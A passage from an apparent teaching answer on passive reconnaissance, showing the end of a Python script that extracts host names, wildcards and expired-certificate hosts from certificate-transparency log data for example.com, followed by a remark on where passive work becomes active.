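    """Hosts whose newest certificate has already expired: decommissioned, or still up and forgotten.
    ISO-8601 timestamps of identical shape compare correctly as text, so no date parsing is needed."""
    return sorted(name for name, not_after in hosts.items() if not_after and not_after < today)


if __name__ == "__main__":
    hosts, wildcards = parse_ct(CRT_SH_SAMPLE, APEX)
    print("hosts:", sorted(hosts))
    print("wildcards:", wildcards)
    print("stale:", stale_hosts(hosts, "2024-03-01T00:00:00"))
```

Everything the script learns came from a third-party log, which is the whole distinction the question is testing; the moment a tester resolves vpn.dev.example.com or connects to old-staging.example.com, the work has become active and the target can see it.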
